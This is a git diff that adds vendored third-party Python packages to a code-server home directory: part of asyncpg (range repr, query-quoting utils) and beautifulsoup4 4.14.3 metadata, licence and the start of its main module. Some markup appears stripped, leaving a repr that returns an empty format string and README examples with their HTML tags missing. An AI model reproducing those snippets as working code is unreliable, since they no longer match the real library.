def __hash__(self) -> int: + return hash(( + self._lower, + self._upper, + self._lower_inc, + self._upper_inc, + self._empty + )) + + def __repr__(self) -> str: + if self._empty: + desc = 'empty' + else: + if self._lower is None or not self._lower_inc: + lb = '(' + else: + lb = '[' + + if self._lower is not None: + lb += repr(self._lower) + + if self._upper is not None: + ub = repr(self._upper) + else: + ub = '' + + if self._upper is None or not self._upper_inc: + ub += ')' + else: + ub += ']' + + desc = '{}, {}'.format(lb, ub) + + return ''.format(desc) + + __str__ = __repr__ diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/utils.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/utils.py new file mode 100755 index 0000000..5c1ca69 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/utils.py @@ -0,0 +1,52 @@ +# Copyright (C) 2016-present the ayncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +import re + + +def _quote_ident(ident): + return '"{}"'.format(ident.replace('"', '""')) + + +def _quote_literal(string): + return "'{}'".format(string.replace("'", "''")) + + +async def _mogrify(conn, query, args): + """Safely inline arguments to query text.""" + # Introspect the target query for argument types and + # build a list of safely-quoted fully-qualified type names. + ps = await conn.prepare(query) + paramtypes = [] + for t in ps.get_parameters(): + if t.name.endswith('[]'): + pname = '_' + t.name[:-2] + else: + pname = t.name + + paramtypes.append('{}.{}'.format( + _quote_ident(t.schema), _quote_ident(pname))) + del ps + + # Use Postgres to convert arguments to text representation + # by casting each value to text. + cols = ['quote_literal(${}::{}::text)'.format(i, t) + for i, t in enumerate(paramtypes, start=1)] + + textified = await conn.fetchrow( + 'SELECT {cols}'.format(cols=', '.join(cols)), *args) + + # Finally, replace $n references with text values. + return re.sub( + r"\$(\d+)\b", + lambda m: ( + textified[int(m.group(1)) - 1] + if textified[int(m.group(1)) - 1] is not None + else "NULL" + ), + query, + ) diff --git a/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/INSTALLER b/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/INSTALLER new file mode 100755 index 0000000..a1b589e --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/METADATA b/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/METADATA new file mode 100755 index 0000000..7fd97b7 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/METADATA @@ -0,0 +1,123 @@ +Metadata-Version: 2.4 +Name: beautifulsoup4 +Version: 4.14.3 +Summary: Screen-scraping library +Project-URL: Download, https://www.crummy.com/software/BeautifulSoup/bs4/download/ +Project-URL: Homepage, https://www.crummy.com/software/BeautifulSoup/bs4/ +Author-email: Leonard Richardson +License: MIT License +License-File: AUTHORS +License-File: LICENSE +Keywords: HTML,XML,parse,soup +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: MIT License +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Topic :: Software Development :: Libraries :: Python Modules +Classifier: Topic :: Text Processing :: Markup :: HTML +Classifier: Topic :: Text Processing :: Markup :: SGML +Classifier: Topic :: Text Processing :: Markup :: XML +Requires-Python: >=3.7.0 +Requires-Dist: soupsieve>=1.6.1 +Requires-Dist: typing-extensions>=4.0.0 +Provides-Extra: cchardet +Requires-Dist: cchardet; extra == 'cchardet' +Provides-Extra: chardet +Requires-Dist: chardet; extra == 'chardet' +Provides-Extra: charset-normalizer +Requires-Dist: charset-normalizer; extra == 'charset-normalizer' +Provides-Extra: html5lib +Requires-Dist: html5lib; extra == 'html5lib' +Provides-Extra: lxml +Requires-Dist: lxml; extra == 'lxml' +Description-Content-Type: text/markdown + +Beautiful Soup is a library that makes it easy to scrape information +from web pages. It sits atop an HTML or XML parser, providing Pythonic +idioms for iterating, searching, and modifying the parse tree. + +# Quick start + +``` +>>> from bs4 import BeautifulSoup +>>> soup = BeautifulSoup("

SomebadHTML") +>>> print(soup.prettify()) + + +

+ Some + + bad + + HTML + + +

+ + +>>> soup.find(string="bad") +'bad' +>>> soup.i +HTML +# +>>> soup = BeautifulSoup("SomebadXML", "xml") +# +>>> print(soup.prettify()) + + + Some + + bad + + XML + + +``` + +To go beyond the basics, [comprehensive documentation is available](https://www.crummy.com/software/BeautifulSoup/bs4/doc/). + +# Links + +* [Homepage](https://www.crummy.com/software/BeautifulSoup/bs4/) +* [Documentation](https://www.crummy.com/software/BeautifulSoup/bs4/doc/) +* [Discussion group](https://groups.google.com/group/beautifulsoup/) +* [Development](https://code.launchpad.net/beautifulsoup/) +* [Bug tracker](https://bugs.launchpad.net/beautifulsoup/) +* [Complete changelog](https://git.launchpad.net/beautifulsoup/tree/CHANGELOG) + +# Note on Python 2 sunsetting + +Beautiful Soup's support for Python 2 was discontinued on December 31, +2020: one year after the sunset date for Python 2 itself. From this +point onward, new Beautiful Soup development will exclusively target +Python 3. The final release of Beautiful Soup 4 to support Python 2 +was 4.9.3. + +# Supporting the project + +If you use Beautiful Soup as part of your professional work, please consider a +[Tidelift subscription](https://tidelift.com/subscription/pkg/pypi-beautifulsoup4?utm_source=pypi-beautifulsoup4&utm_medium=referral&utm_campaign=readme). +This will support many of the free software projects your organization +depends on, not just Beautiful Soup. + +If you use Beautiful Soup for personal projects, the best way to say +thank you is to read +[Tool Safety](https://www.crummy.com/software/BeautifulSoup/zine/), a zine I +wrote about what Beautiful Soup has taught me about software +development. + +# Building the documentation + +The bs4/doc/ directory contains full documentation in Sphinx +format. Run `make html` in that directory to create HTML +documentation. + +# Running the unit tests + +Beautiful Soup supports unit test discovery using Pytest: + +``` +$ pytest +``` + diff --git a/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/RECORD b/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/RECORD new file mode 100755 index 0000000..252891d --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/RECORD @@ -0,0 +1,38 @@ +beautifulsoup4-4.14.3.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +beautifulsoup4-4.14.3.dist-info/METADATA,sha256=Ac93vA8Xp9FtgOcKXFM8ESfVdztimUfJ3WUpVlhKtsY,3812 +beautifulsoup4-4.14.3.dist-info/RECORD,, +beautifulsoup4-4.14.3.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +beautifulsoup4-4.14.3.dist-info/WHEEL,sha256=qtCwoSJWgHk21S1Kb4ihdzI2rlJ1ZKaIurTj_ngOhyQ,87 +beautifulsoup4-4.14.3.dist-info/licenses/AUTHORS,sha256=uYkjiRjh_aweRnF8tAW2PpJJeickE68NmJwd9siry28,2201 +beautifulsoup4-4.14.3.dist-info/licenses/LICENSE,sha256=VbTY1LHlvIbRDvrJG3TIe8t3UmsPW57a-LnNKtxzl7I,1441 +bs4/__init__.py,sha256=E7wiVp7oQK0JhdAYxpehZa8drv3W_sJv5oeTFiBfR5o,44386 +bs4/__pycache__/__init__.cpython-312.pyc,, +bs4/__pycache__/_deprecation.cpython-312.pyc,, +bs4/__pycache__/_typing.cpython-312.pyc,, +bs4/__pycache__/_warnings.cpython-312.pyc,, +bs4/__pycache__/css.cpython-312.pyc,, +bs4/__pycache__/dammit.cpython-312.pyc,, +bs4/__pycache__/diagnose.cpython-312.pyc,, +bs4/__pycache__/element.cpython-312.pyc,, +bs4/__pycache__/exceptions.cpython-312.pyc,, +bs4/__pycache__/filter.cpython-312.pyc,, +bs4/__pycache__/formatter.cpython-312.pyc,, +bs4/_deprecation.py,sha256=niHJCk37APg8KEuFOa57ZXaxLdBmc_2V6uuaJqu7r30,2408 +bs4/_typing.py,sha256=zNcx7R1yCTK8WwtumP28hc7CJ3pMyZXj_VAeYaNXMZA,7549 +bs4/_warnings.py,sha256=ZuOETgcnEbZgw2N0nnNXn6wvtrn2ut7AF0d98bvkMFc,4711 +bs4/builder/__init__.py,sha256=Rl4qjOXvdyyyjayOFqbkgoUoo81IgoyKD-RwWeVK59g,31194 +bs4/builder/__pycache__/__init__.cpython-312.pyc,, +bs4/builder/__pycache__/_html5lib.cpython-312.pyc,, +bs4/builder/__pycache__/_htmlparser.cpython-312.pyc,, +bs4/builder/__pycache__/_lxml.cpython-312.pyc,, +bs4/builder/_html5lib.py,sha256=hL6xUk4_I2i5CMguFoYFlrI26cY4Dut7fOEQrUctHIM,23607 +bs4/builder/_htmlparser.py,sha256=CnULPQV2rm4vLojJABpQ7Xm9diddnEZx2Wcz_VTC1Mg,17445 +bs4/builder/_lxml.py,sha256=ks1e8boA_nOA2oomAhxeudccR6ThbEE-EllFqHRoPLA,18969 +bs4/css.py,sha256=_m_l_4SGWHnY620VJ21j_qQH1RX3p91sYVemgKxaLsM,12713 +bs4/dammit.py,sha256=ZJWa9K32X6N2imFHleqUq0ekf592weU1lvULN_WYWYk,57024 +bs4/diagnose.py,sha256=at98iuxyOrqec4V8iwkTIbNUqBCsq9Lr3fDAQx2129Y,7846 +bs4/element.py,sha256=oXmj7LG_2NpsDK90mq73q0PMK0FjFBIGSeTTJLVwwTc,120237 +bs4/exceptions.py,sha256=Q9FOadNe8QRvzDMaKSXe2Wtl8JK_oAZW7mbFZBVP_GE,951 +bs4/filter.py,sha256=rw8ZNhTDLEJVCEiSifou5tZR_3zBLeuvAyouY82qU_E,29201 +bs4/formatter.py,sha256=uBT0k6W8O5kJ9PCuJYjra97yoUqC-dlM9D_v-oRM0r8,10478 +bs4/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 diff --git a/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/REQUESTED b/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/REQUESTED new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/WHEEL b/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/WHEEL new file mode 100755 index 0000000..12228d4 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/WHEEL @@ -0,0 +1,4 @@ +Wheel-Version: 1.0 +Generator: hatchling 1.27.0 +Root-Is-Purelib: true +Tag: py3-none-any diff --git a/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/licenses/AUTHORS b/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/licenses/AUTHORS new file mode 100755 index 0000000..18926c2 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/licenses/AUTHORS @@ -0,0 +1,49 @@ +Behold, mortal, the origins of Beautiful Soup... +================================================ + +Leonard Richardson is the primary maintainer. + +Aaron DeVore, Isaac Muse and Chris Papademetrious have made +significant contributions to the code base. + +Mark Pilgrim provided the encoding detection code that forms the base +of UnicodeDammit. + +Thomas Kluyver and Ezio Melotti finished the work of getting Beautiful +Soup 4 working under Python 3. + +Simon Willison wrote soupselect, which was used to make Beautiful Soup +support CSS selectors. Isaac Muse wrote SoupSieve, which made it +possible to _remove_ the CSS selector code from Beautiful Soup. + +Sam Ruby helped with a lot of edge cases. + +Jonathan Ellis was awarded the prestigious Beau Potage D'Or for his +work in solving the nestable tags conundrum. + +An incomplete list of people have contributed patches to Beautiful +Soup: + + Istvan Albert, Andrew Lin, Anthony Baxter, Oliver Beattie, Andrew +Boyko, Tony Chang, Francisco Canas, "Delong", Zephyr Fang, Fuzzy, +Roman Gaufman, Yoni Gilad, Richie Hindle, Toshihiro Kamiya, Peteris +Krumins, Kent Johnson, Marek Kapolka, Andreas Kostyrka, Roel Kramer, +Ben Last, Robert Leftwich, Stefaan Lippens, "liquider", Staffan +Malmgren, Ksenia Marasanova, JP Moins, Adam Monsen, John Nagle, "Jon", +Ed Oskiewicz, Martijn Peters, Greg Phillips, Giles Radford, Stefano +Revera, Arthur Rudolph, Marko Samastur, James Salter, Jouni Seppänen, +Alexander Schmolck, Tim Shirley, Geoffrey Sneddon, Ville Skyttä, +"Vikas", Jens Svalgaard, Andy Theyers, Eric Weiser, Glyn Webster, John +Wiseman, Paul Wright, Danny Yoo + +An incomplete list of people who made suggestions or found bugs or +found ways to break Beautiful Soup: + + Hanno Böck, Matteo Bertini, Chris Curvey, Simon Cusack, Bruce Eckel, + Matt Ernst, Michael Foord, Tom Harris, Bill de hOra, Donald Howes, + Matt Patterson, Scott Roberts, Steve Strassmann, Mike Williams, + warchild at redho dot com, Sami Kuisma, Carlos Rocha, Bob Hutchison, + Joren Mc, Michal Migurski, John Kleven, Tim Heaney, Tripp Lilley, Ed + Summers, Dennis Sutch, Chris Smith, Aaron Swartz, Stuart + Turner, Greg Edwards, Kevin J Kalupson, Nikos Kouremenos, Artur de + Sousa Rocha, Yichun Wei, Per Vognsen diff --git a/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/licenses/LICENSE b/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/licenses/LICENSE new file mode 100755 index 0000000..08e3a9c --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/licenses/LICENSE @@ -0,0 +1,31 @@ +Beautiful Soup is made available under the MIT license: + + Copyright (c) Leonard Richardson + + Permission is hereby granted, free of charge, to any person obtaining + a copy of this software and associated documentation files (the + "Software"), to deal in the Software without restriction, including + without limitation the rights to use, copy, modify, merge, publish, + distribute, sublicense, and/or sell copies of the Software, and to + permit persons to whom the Software is furnished to do so, subject to + the following conditions: + + The above copyright notice and this permission notice shall be + included in all copies or substantial portions of the Software. + + THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + SOFTWARE. + +Beautiful Soup incorporates code from the html5lib library, which is +also made available under the MIT license. Copyright (c) James Graham +and other contributors + +Beautiful Soup has an optional dependency on the soupsieve library, +which is also made available under the MIT license. Copyright (c) +Isaac Muse diff --git a/code-server-config/.local/lib/python3.12/site-packages/bs4/__init__.py b/code-server-config/.local/lib/python3.12/site-packages/bs4/__init__.py new file mode 100755 index 0000000..19b7c0e --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/bs4/__init__.py @@ -0,0 +1,1174 @@ +"""Beautiful Soup Elixir and Tonic - "The Screen-Scraper's Friend". + +http://www.crummy.com/software/BeautifulSoup/ + +Beautiful Soup uses a pluggable XML or HTML parser to parse a +(possibly invalid) document into a tree representation. Beautiful Soup +provides methods and Pythonic idioms that make it easy to navigate, +search, and modify the parse tree. + +Beautiful Soup works with Python 3.7 and up. It works better if lxml +and/or html5lib is installed, but they are not required. + +For more than you ever wanted to know about Beautiful Soup, see the +documentation: http://www.crummy.com/software/BeautifulSoup/bs4/doc/ +""" + +__author__ = "Leonard Richardson (leonardr@segfault.org)" +__version__ = "4.14.3" +__copyright__ = "Copyright (c) 2004-2025 Leonard Richardson" +# Use of this source code is governed by the MIT license. +__license__ = "MIT" + +__all__ = [ + "AttributeResemblesVariableWarning", + "BeautifulSoup", + "Comment", + "Declaration", + "ProcessingInstruction", + "ResultSet", + "CSS", + "Script", + "Stylesheet", + "Tag", + "TemplateString", + "ElementFilter", + "UnicodeDammit", + "CData", + "Doctype", + + # Exceptions + "FeatureNotFound", + "ParserRejectedMarkup", + "StopParsing", + + # Warnings + "AttributeResemblesVariableWarning", + "GuessedAtParserWarning", + "MarkupResemblesLocatorWarning", + "UnusualUsageWarning", + "XMLParsedAsHTMLWarning", +] + +from collections import Counter +import io +import sys +import warnings + +# The very first thing we do is give a useful error if someone is +# running this code under Python 2. +if sys.version_info.major < 3: + raise ImportError( + "You are trying to use a Python 3-specific version of Beautiful Soup under Python 2. This will not work. The final version of Beautiful Soup to support Python 2 was 4.9.3." + ) + +from .builder import ( + builder_registry, + TreeBuilder, +) +from .builder._htmlparser import HTMLParserTreeBuilder +from .dammit import UnicodeDammit +from .css import CSS +from ._deprecation import ( + _deprecated, +) +from .element import ( + CData, + Comment, + DEFAULT_OUTPUT_ENCODING, + Declaration, + Doctype, + NavigableString, + PageElement, + ProcessingInstruction, + PYTHON_SPECIFIC_ENCODINGS, + ResultSet, + Script, + Stylesheet, + Tag, + TemplateString, +) +from .formatter import Formatter +from .filter import ( + ElementFilter, + SoupStrainer, +) +from typing import ( + Any, + cast, + Counter as CounterType, + Dict, + Iterator, + List, + Sequence, + Sized, + Optional, + Type, + Union, +) + +from bs4._typing import ( + _Encoding, + _Encodings, + _IncomingMarkup, + _InsertableElement, + _RawAttributeValue, + _RawAttributeValues, + _RawMarkup, +) + +# Import all warnings and exceptions into the main package. +from bs4.exceptions import ( + FeatureNotFound, + ParserRejectedMarkup, + StopParsing, +) +from bs4._warnings import ( + AttributeResemblesVariableWarning, + GuessedAtParserWarning, + MarkupResemblesLocatorWarning, + UnusualUsageWarning, + XMLParsedAsHTMLWarning, +) + + +class BeautifulSoup(Tag): + """A data structure representing a parsed HTML or XML document. + + Most of the methods you'll call on a BeautifulSoup object are inherited from + PageElement or Tag. + + Internally, this class defines the basic interface called by the + tree builders when converting an HTML/XML document into a data + structure. The interface abstracts away the differences between + parsers. To write a new tree builder, you'll need to understand + these methods as a whole. + + These methods will be called by the BeautifulSoup constructor: + * reset() + * feed(markup) + + The tree builder may call these methods from its feed() implementation: + * handle_starttag(name, attrs) # See note about return value + * handle_endtag(name) + * handle_data(data) # Appends to the current data node + * endData(containerClass) # Ends the current data node + + No matter how complicated the underlying parser is, you should be + able to build a tree using 'start tag' events, 'end tag' events, + 'data' events, and "done with data" events. + + If you encounter an empty-element tag (aka a self-closing tag, + like HTML's
tag), call handle_starttag and then + handle_endtag. + """ + + #: Since `BeautifulSoup` subclasses `Tag`, it's possible to treat it as + #: a `Tag` with a `Tag.name`. Hoever, this name makes it clear the + #: `BeautifulSoup` object isn't a real markup tag. + ROOT_TAG_NAME: str = "[document]" + + #: If the end-user gives no indication which tree builder they + #: want, look for one with these features. + DEFAULT_BUILDER_FEATURES: Sequence[str] = ["html", "fast"] + + #: A string containing all ASCII whitespace characters, used in + #: during parsing to detect data chunks that seem 'empty'. + ASCII_SPACES: str = "\x20\x0a\x09\x0c\x0d" + + # FUTURE PYTHON: + element_classes: Dict[Type[PageElement], Type[PageElement]] #: :meta private: + builder: TreeBuilder #: :meta private: + is_xml: bool + known_xml: Optional[bool] + parse_only: Optional[SoupStrainer] #: :meta private: + + # These members are only used while parsing markup. + markup: Optional[_RawMarkup] #: :meta private: + current_data: List[str] #: :meta private: + currentTag: Optional[Tag] #: :meta private: + tagStack: List[Tag] #: :meta private: + open_tag_counter: CounterType[str] #: :meta private: + preserve_whitespace_tag_stack: List[Tag] #: :meta private: + string_container_stack: List[Tag] #: :meta private: + _most_recent_element: Optional[PageElement] #: :meta private: + + #: Beautiful Soup's best guess as to the character encoding of the + #: original document. + original_encoding: Optional[_Encoding] + + #: The character encoding, if any, that was explicitly defined + #: in the original document. This may or may not match + #: `BeautifulSoup.original_encoding`. + declared_html_encoding: Optional[_Encoding] + + #: This is True if the markup that was parsed contains + #: U+FFFD REPLACEMENT_CHARACTER characters which were not present + #: in the original markup. These mark character sequences that + #: could not be represented in Unicode. + contains_replacement_characters: bool + + def __init__( + self, + markup: _IncomingMarkup = "", + features: Optional[Union[str, Sequence[str]]] = None, + builder: Optional[Union[TreeBuilder, Type[TreeBuilder]]] = None, + parse_only: Optional[SoupStrainer] = None, + from_encoding: Optional[_Encoding] = None, + exclude_encodings: Optional[_Encodings] = None, + element_classes: Optional[Dict[Type[PageElement], Type[PageElement]]] = None, + **kwargs: Any, + ): + """Constructor. + + :param markup: A string or a file-like object representing + markup to be parsed. + + :param features: Desirable features of the parser to be + used. This may be the name of a specific parser ("lxml", + "lxml-xml", "html.parser", or "html5lib") or it may be the + type of markup to be used ("html", "html5", "xml"). It's + recommended that you name a specific parser, so that + Beautiful Soup gives you the same results across platforms + and virtual environments. + + :param builder: A TreeBuilder subclass to instantiate (or + instance to use) instead of looking one up based on + `features`. You only need to use this if you've implemented a + custom TreeBuilder. + + :param parse_only: A SoupStrainer. Only parts of the document + matching the SoupStrainer will be considered. This is useful + when parsing part of a document that would otherwise be too + large to fit into memory. + + :param from_encoding: A string indicating the encoding of the + document to be parsed. Pass this in if Beautiful Soup is + guessing wrongly about the document's encoding. + + :param exclude_encodings: A list of strings indicating + encodings known to be wrong. Pass this in if you don't know + the document's encoding but you know Beautiful Soup's guess is + wrong. + + :param element_classes: A dictionary mapping BeautifulSoup + classes like Tag and NavigableString, to other classes you'd + like to be instantiated instead as the parse tree is + built. This is useful for subclassing Tag or NavigableString + to modify default behavior. + + :param kwargs: For backwards compatibility purposes, the + constructor accepts certain keyword arguments used in + Beautiful Soup 3. None of these arguments do anything in + Beautiful Soup 4; they will result in a warning and then be + ignored. + + Apart from this, any keyword arguments passed into the + BeautifulSoup constructor are propagated to the TreeBuilder + constructor. This makes it possible to configure a + TreeBuilder by passing in arguments, not just by saying which + one to use. + """ + if "convertEntities" in kwargs: + del kwargs["convertEntities"] + warnings.warn( + "BS4 does not respect the convertEntities argument to the " + "BeautifulSoup constructor. Entities are always converted " + "to Unicode characters." + ) + + if "markupMassage" in kwargs: + del kwargs["markupMassage"] + warnings.warn( + "BS4 does not respect the markupMassage argument to the " + "BeautifulSoup constructor. The tree builder is responsible " + "for any necessary markup massage." + ) + + if "smartQuotesTo" in kwargs: + del kwargs["smartQuotesTo"] + warnings.warn( + "BS4 does not respect the smartQuotesTo argument to the " + "BeautifulSoup constructor. Smart quotes are always converted " + "to Unicode characters." + ) + + if "selfClosingTags" in kwargs: + del kwargs["selfClosingTags"] + warnings.warn( + "Beautiful Soup 4 does not respect the selfClosingTags argument to the " + "BeautifulSoup constructor. The tree builder is responsible " + "for understanding self-closing tags." + ) + + if "isHTML" in kwargs: + del kwargs["isHTML"] + warnings.warn( + "Beautiful Soup 4 does not respect the isHTML argument to the " + "BeautifulSoup constructor. Suggest you use " + "features='lxml' for HTML and features='lxml-xml' for " + "XML." + ) + + def deprecated_argument(old_name: str, new_name: str) -> Optional[Any]: + if old_name in kwargs: + warnings.warn( + 'The "%s" argument to the BeautifulSoup constructor ' + 'was renamed to "%s" in Beautiful Soup 4.0.0' + % (old_name, new_name), + DeprecationWarning, + stacklevel=3, + ) + return kwargs.pop(old_name) + return None + + parse_only = parse_only or deprecated_argument("parseOnlyThese", "parse_only") + if parse_only is not None: + # Issue a warning if we can tell in advance that + # parse_only will exclude the entire tree. + if parse_only.excludes_everything: + warnings.warn( + f"The given value for parse_only will exclude everything: {parse_only}", + UserWarning, + stacklevel=3, + ) + + from_encoding = from_encoding or deprecated_argument( + "fromEncoding", "from_encoding" + ) + + if from_encoding and isinstance(markup, str): + warnings.warn( + "You provided Unicode markup but also provided a value for from_encoding. Your from_encoding will be ignored." + ) + from_encoding = None + + self.element_classes = element_classes or dict() + + # We need this information to track whether or not the builder + # was specified well enough that we can omit the 'you need to + # specify a parser' warning. + original_builder = builder + original_features = features + + builder_class: Optional[Type[TreeBuilder]] = None + if isinstance(builder, type): + # A builder class was passed in; it needs to be instantiated. + builder_class = builder + builder = None + elif builder is None: + if isinstance(features, str): + features = [features] + if features is None or len(features) == 0: + features = self.DEFAULT_BUILDER_FEATURES + possible_builder_class = builder_registry.lookup(*features) + if possible_builder_class is None: + raise FeatureNotFound( + "Couldn't find a tree builder with the features you " + "requested: %s. Do you need to install a parser library?" + % ",".join(features) + ) + builder_class = possible_builder_class + + # At this point either we have a TreeBuilder instance in + # builder, or we have a builder_class that we can instantiate + # with the remaining **kwargs. + if builder is None: + assert builder_class is not None + builder = builder_class(**kwargs) + if ( + not original_builder + and not ( + original_features == builder.NAME + or ( + isinstance(original_features, str) + and original_features in builder.ALTERNATE_NAMES + ) + ) + and markup + ): + # The user did not tell us which TreeBuilder to use, + # and we had to guess. Issue a warning. + if builder.is_xml: + markup_type = "XML" + else: + markup_type = "HTML" + + # This code adapted from warnings.py so that we get the same line + # of code as our warnings.warn() call gets, even if the answer is wrong + # (as it may be in a multithreading situation). + caller = None + try: + caller = sys._getframe(1) + except ValueError: + pass + if caller: + globals = caller.f_globals + line_number = caller.f_lineno + else: + globals = sys.__dict__ + line_number = 1 + filename = globals.get("__file__") + if filename: + fnl = filename.lower() + if fnl.endswith((".pyc", ".pyo")): + filename = filename[:-1] + if filename: + # If there is no filename at all, the user is most likely in a REPL, + # and the warning is not necessary. + values = dict( + filename=filename, + line_number=line_number, + parser=builder.NAME, + markup_type=markup_type, + ) + warnings.warn( + GuessedAtParserWarning.MESSAGE % values, + GuessedAtParserWarning, + stacklevel=2, + ) + else: + if kwargs: + warnings.warn( + "Keyword arguments to the BeautifulSoup constructor will be ignored. These would normally be passed into the TreeBuilder constructor, but a TreeBuilder instance was passed in as `builder`." + ) + + self.builder = builder + self.is_xml = builder.is_xml + self.known_xml = self.is_xml + self._namespaces = dict() + self.parse_only = parse_only + + if hasattr(markup, "read"): # It's a file-type object. + markup = cast(io.IOBase, markup).read() + elif not isinstance(markup, (bytes, str)) and not hasattr(markup, "__len__"): + raise TypeError( + f"Incoming markup is of an invalid type: {markup!r}. Markup must be a string, a bytestring, or an open filehandle." + ) + elif isinstance(markup, Sized) and len(markup) <= 256 and ( + (isinstance(markup, bytes) and b"<" not in markup and b"\n" not in markup) + or (isinstance(markup, str) and "<" not in markup and "\n" not in markup) + ): + # Issue warnings for a couple beginner problems + # involving passing non-markup to Beautiful Soup. + # Beautiful Soup will still parse the input as markup, + # since that is sometimes the intended behavior. + if not self._markup_is_url(markup): + self._markup_resembles_filename(markup) + + # At this point we know markup is a string or bytestring. If + # it was a file-type object, we've read from it. + markup = cast(_RawMarkup, markup) + + rejections = [] + success = False + for ( + self.markup, + self.original_encoding, + self.declared_html_encoding, + self.contains_replacement_characters, + ) in self.builder.prepare_markup( + markup, from_encoding, exclude_encodings=exclude_encodings + ): + self.reset() + self.builder.initialize_soup(self) + try: + self._feed() + success = True + break + except ParserRejectedMarkup as e: + rejections.append(e) + pass + + if not success: + other_exceptions = [str(e) for e in rejections] + raise ParserRejectedMarkup( + "The markup you provided was rejected by the parser. Trying a different parser or a different encoding may help.\n\nOriginal exception(s) from parser:\n " + + "\n ".join(other_exceptions) + ) + + # Clear out the markup and remove the builder's circular + # reference to this object. + self.markup = None + self.builder.soup = None + + def copy_self(self) -> "BeautifulSoup": + """Create a new BeautifulSoup object with the same TreeBuilder, + but not associated with any markup. + + This is the first step of the deepcopy process. + """ + clone = type(self)("", None, self.builder) + + # Keep track of the encoding of the original document, + # since we won't be parsing it again. + clone.original_encoding = self.original_encoding + return clone + + def __getstate__(self) -> Dict[str, Any]: + # Frequently a tree builder can't be pickled. + d = dict(self.__dict__) + if "builder" in d and d["builder"] is not None and not self.builder.picklable: + d["builder"] = type(self.builder) + # Store the contents as a Unicode string. + d["contents"] = [] + d["markup"] = self.decode() + + # If _most_recent_element is present, it's a Tag object left + # over from initial parse. It might not be picklable and we + # don't need it. + if "_most_recent_element" in d: + del d["_most_recent_element"] + return d + + def __setstate__(self, state: Dict[str, Any]) -> None: + # If necessary, restore the TreeBuilder by looking it up. + self.__dict__ = state + if isinstance(self.builder, type): + self.builder = self.builder() + elif not self.builder: + # We don't know which builder was used to build this + # parse tree, so use a default we know is always available. + self.builder = HTMLParserTreeBuilder() + self.builder.soup = self + self.reset() + self._feed() + + @classmethod + @_deprecated( + replaced_by="nothing (private method, will be removed)", version="4.13.0" + ) + def _decode_markup(cls, markup: _RawMarkup) -> str: + """Ensure `markup` is Unicode so it's safe to send into warnings.warn. + + warnings.warn had this problem back in 2010 but fortunately + not anymore. This has not been used for a long time; I just + noticed that fact while working on 4.13.0. + """ + if isinstance(markup, bytes): + decoded = markup.decode("utf-8", "replace") + else: + decoded = markup + return decoded + + @classmethod + def _markup_is_url(cls, markup: _RawMarkup) -> bool: + """Error-handling method to raise a warning if incoming markup looks + like a URL. + + :param markup: A string of markup. + :return: Whether or not the markup resembled a URL + closely enough to justify issuing a warning. + """ + problem: bool = False + if isinstance(markup, bytes): + problem = ( + any(markup.startswith(prefix) for prefix in (b"http:", b"https:")) + and b" " not in markup + ) + elif isinstance(markup, str): + problem = ( + any(markup.startswith(prefix) for prefix in ("http:", "https:")) + and " " not in markup + ) + else: + return False + + if not problem: + return False + warnings.warn( + MarkupResemblesLocatorWarning.URL_MESSAGE % dict(what="URL"), + MarkupResemblesLocatorWarning, + stacklevel=3, + ) + return True + + @classmethod + def _markup_resembles_filename(cls, markup: _RawMarkup) -> bool: + """Error-handling method to issue a warning if incoming markup + resembles a filename. + + :param markup: A 